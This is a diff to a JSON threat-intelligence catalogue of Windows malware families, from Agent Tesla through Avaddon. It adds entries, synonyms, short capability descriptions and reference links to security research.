"https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", + "https://blog.minerva-labs.com/preventing-agenttesla", + "https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/", + "https://lab52.io/blog/a-twisted-malware-infection-chain/", + "https://malwatch.github.io/posts/agent-tesla-malware-analysis/", + "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://isc.sans.edu/diary/rss/27092", + "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", + "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://blog.malwarelab.pl/posts/basfu_aggah/", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/" + ], + "synonyms": [ + "AgenTesla", + "AgentTesla", + "Negasteal" ], - "synonyms": [], "type": [] }, "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", "value": "Agent Tesla" }, { - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", + "description": "The agfSpy backdoor retrieves configuration and commands from its C&C server. These commands allow the backdoor to execute shell commands and send the execution results back to the server. It also enumerates directories and can list, upload, download, and execute files, among other functions. The capabilities of agfSpy are very similar to dneSpy, except each backdoor uses a different C&C server and various formats in message exchanges.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy", + "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "405fe149-1454-4e8c-a4a3-d56e0c5f62d7", + "value": "AgfSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas", + "https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/" + ], + "synonyms": [ + "BlueTraveller" + ], + "type": [] + }, + "uuid": "dff7e10c-41ca-481d-8003-73169803272d", + "value": "Albaniiutas" + }, + { + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", @@ -3891,14 +8009,28 @@ "uuid": "43ec8adc-0658-4765-be20-f22679097fab", "value": "Aldibot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.alfonso_stealer", + "https://twitter.com/3xp0rtblog/status/1344352253294104576" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a76874b3-12d0-4dec-9813-01819e6b6d49", + "value": "Alfonso Stealer" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/", - "https://www.s21sec.com/en/blog/2017/01/alice-simplicity-for-atm-jackpotting/", - "https://www.symantec.com/security-center/writeup/2016-122104-0203-99" + "https://www.symantec.com/security-center/writeup/2016-122104-0203-99", + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [ "AliceATM", @@ -3914,8 +8046,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", + "https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", - "https://www.nuix.com/blog/alina-continues-spread-its-wings", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/", "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", @@ -3932,6 +8065,21 @@ "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", "value": "Alina POS" }, + { + "description": "AllaKore is a simple Remote Access Tool written in Delphi, first observed in 2015 but still in early stages of development. It implements the RFB protocol which uses frame buffers and thus is able to send back only the changes of screen frames to the controller, speeding up the transport and visualization control.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore", + "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf", + "https://twitter.com/_re_fox/status/1212070711206064131", + "https://github.com/Anderson-D/AllaKore" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fb1c6035-42ee-403c-a2ae-a53f7ab2de00", + "value": "AllaKore" + }, { "description": "", "meta": { @@ -3948,6 +8096,19 @@ "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", "value": "Allaple" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.almanahe", + "https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + ], + "synonyms": [], + "type": [] + }, + "uuid": "352f79b1-6862-4164-afa3-a1d787c40ec1", + "value": "Almanahe" + }, { "description": "", "meta": { @@ -4018,7 +8179,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" + "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", + "https://www.secureworks.com/research/threat-profiles/nickel-gladstone" ], "synonyms": [], "type": [] @@ -4046,13 +8208,17 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html", - "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html" + "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", + "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt", + "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/" ], "synonyms": [ "Olmarik", "Pihar", "TDL", - "TDSS" + "TDSS", + "wowlik" ], "type": [] }, @@ -4064,9 +8230,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey", - "https://twitter.com/0xffff0800/status/1062948406266642432", "https://twitter.com/ViriBack/status/1062405363457118210", - "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/" + "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/", + "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/", + "https://nao-sec.org/2019/04/Analyzing-amadey.html", + "https://www.anquanke.com/post/id/230116", + "https://twitter.com/0xffff0800/status/1062948406266642432", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [], "type": [] @@ -4091,7 +8266,7 @@ "value": "AMTsol" }, { - "description": "", + "description": "Anatova is a ransomware family with the goal of ciphering all the files that it can and then requesting payment from the victim. It will also check if network shares are connected and will encrypt the files on these shares too. The code is also prepared to support modular extensions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom", @@ -4104,24 +8279,51 @@ "uuid": "2a28ad28-8ba5-4b8b-9652-bc0cdd37b2c4", "value": "Anatova Ransomware" }, + { + "description": "Anchor is a sophisticated backdoor served as a module to a subset of TrickBot installations. Operating since August 2018 it is not delivered to everybody, but contrary is delivered only to high-profile targets. Since its C2 communication scheme is very similar to the one implemented in the early TrickBot, multiple experts believe it could be attributed to the same authors.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", + "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/", + "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns", + "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/", + "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", + "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", + "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", + "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c38308a1-c89d-4835-b057-744f66ff7ddc", + "value": "Anchor" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", - "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet", "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", "https://blog.avast.com/andromeda-under-the-microscope", - "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08", "http://blog.morphisec.com/andromeda-tactics-analyzed", "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", "http://resources.infosecinstitute.com/andromeda-bot-analysis/", - "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features", "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", + "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", + "https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/", "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html" @@ -4141,15 +8343,59 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", - "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south" + ], + "synonyms": [ + "Gelup" + ], + "type": [] + }, + "uuid": "85673cd4-fb05-4f6d-94ec-71290ae2e422", + "value": "AndroMut" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf" + ], + "synonyms": [ + "UPPERCUT", + "lena" ], - "synonyms": [], "type": [] }, "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", "value": "Anel" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.antefrigus", + "https://github.com/albertzsigovits/malware-notes/blob/master/Antefrigus.md", + "http://id-ransomware.blogspot.com/2019/11/antefrigus-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "04788457-5b72-4a66-8f2c-73497919ece2", + "value": "AnteFrigus Ransomware" + }, { "description": "", "meta": { @@ -4164,6 +8410,21 @@ "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", "value": "Antilam" }, + { + "description": "According to Microsoft Security Intelligence, Anubis is an information stealer sold on underground forums since June 2020. The name overlaps with the Android banking malware but is unrelated. It contains code forked from Loki PWS.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis", + "https://twitter.com/MsftSecIntel/status/1298752223321546754" + ], + "synonyms": [ + "Anubis Stealer" + ], + "type": [] + }, + "uuid": "b19c9f63-a18d-47bb-a9fe-1f9cea21bac0", + "value": "Anubis (Windows)" + }, { "description": "", "meta": { @@ -4194,7 +8455,47 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", + "https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", + "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", + "https://twitter.com/VK_Intel/status/1182730637016481793" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2b655949-8a17-46e5-9522-519c6d77c45f", + "value": "AppleJeus (Windows)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c7f8e3b8-328d-43c3-9235-9a2f704389b4", + "value": "Appleseed" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax", + "https://medium.com/@MalFuzzer/dissecting-ardamax-keylogger-f33f922d2576", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf" ], "synonyms": [], "type": [] @@ -4215,13 +8516,26 @@ "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", "value": "Arefty" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody", + "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/", + "https://securelist.com/naikons-aria/96899/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5fa1c068-8e73-4930-b6fe-8c92c6357df6", + "value": "Aria-body" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", - "http://remote-keylogger.net/", - "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/" + "http://remote-keylogger.net/" ], "synonyms": [ "Aaron Keylogger" @@ -4236,9 +8550,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/" ], - "synonyms": [], + "synonyms": [ + "ArkeiStealer" + ], "type": [] }, "uuid": "59eff508-7f26-4fd8-b526-5772a9f3d9a6", @@ -4259,12 +8576,29 @@ "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", "value": "ARS VBS Loader" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.artfulpie", + "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-045e" + ], + "synonyms": [], + "type": [] + }, + "uuid": "bc0ad216-9b56-489e-858d-68522e1fdfaf", + "value": "ARTFULPIE" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra", - "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/" + "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", + "https://www.freebuf.com/articles/database/192726.html", + "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english" ], "synonyms": [], "type": [] @@ -4318,8 +8652,66 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago", - "http://blog.talosintel.com/2017/02/athena-go.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex", + "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a51595aa-a399-4332-a14d-a378bae609e7", + "value": "Asruex" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth", + "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/", + "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/", + "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/", + "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", + "https://blog.talosintelligence.com/2020/05/astaroth-analysis.html", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://blog.easysol.net/meet-lucifer-international-trojan/", + "https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/", + "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [ + "Guildma" + ], + "type": [] + }, + "uuid": "0cdb83dd-106b-458e-8d04-ca864281e06e", + "value": "Astaroth" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", + "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c94c4f23-20d1-4858-8f94-01a54b213981", + "value": "AsyncRAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago" ], "synonyms": [], "type": [] @@ -4358,7 +8750,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", - "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/" + "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/", + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/" ], "synonyms": [], "type": [] @@ -4371,6 +8765,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", + "https://www.zdnet.com/article/new-silence-hacking-group-suspected-of-having-ties-to-cyber-security-industry/", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], @@ -4385,6 +8780,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-kingswood", + "https://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" ], "synonyms": [], @@ -4393,6 +8790,25 @@ "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", "value": "ATMSpitter" }, + { + "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor\u2019s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware\u2019s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor", + "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform", + "https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami", + "https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/", + "https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html", + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf", + "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform/", + "https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f5f61bc0-aad2-4da3-83db-703ea516c03b", + "value": "Attor" + }, { "description": "", "meta": { @@ -4427,15 +8843,46 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", + "https://twitter.com/malwrhunterteam/status/1001461507513880576", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/" ], - "synonyms": [], + "synonyms": [ + "OneKeyLocker" + ], "type": [] }, "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", "value": "Aurora" }, + { + "description": "Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://twitter.com/Securityinbits/status/1271065316903120902", + "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/", + "https://www.swascan.com/it/avaddon-ransomware/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://arxiv.org/pdf/2102.04796.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", + "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/", + "https://twitter.com/dk_samper/status/1348560784285167617", + "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", + "https://www.tgsoft.it/files/report/download.asp?id=568531345", + 